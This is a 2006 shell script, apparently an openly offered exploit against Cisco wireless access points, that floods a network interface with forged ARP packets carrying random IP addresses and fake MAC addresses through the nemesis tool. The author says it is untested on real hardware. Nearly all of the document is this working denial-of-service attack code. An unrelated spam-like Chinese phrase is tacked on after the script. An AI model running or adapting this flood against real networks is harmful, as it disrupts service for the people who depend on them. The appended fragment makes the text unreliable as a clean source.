#!/bin/sh # kokanin 20060115 - yay sunday morning! this is an exploit for # http://www.cisco.com/warp/public/707/cisco-sa-20060112-wireless.shtml # Made for my man in Hong Kong, j0 Ole, greetings from www.lort.dk # Uses/needs nemesis(.sf.net) and jot (FreeBSD builtin) for random ip generation. # The script should be tested against an actual Cisco AP to determine the needed # packetamount and stuff, but I don't have one. # Where is nemesis? nemesis=/usr/local/bin/nemesis # did the user supply a device and the amount? if [ "x$2" = "x" ]; then (echo "usage: blabla.sh " && kill $$) ;fi for i in `jot $2` ; do oct1=`jot -r 1 1 255`;oct2=`jot -r 1 1 255`;oct3=`jot -r 1 1 255`;oct4=`jot -r 1 1 255`; $nemesis arp -v -S $oct1.$oct2.$oct3.$oct4 -D $oct4.$oct3.$oct2.$oct1 \ -h fe:da:be:fe:da:be -m fe:da:be:fe:da:be -d $1 -H fe:da:be:fe:da:be \ -M ff:ff:ff:ff:ff:ff done | grep Protocol | awk '{ print "injecting: " $3" "$4" "$5}' echo "done"

亚洲欧美在线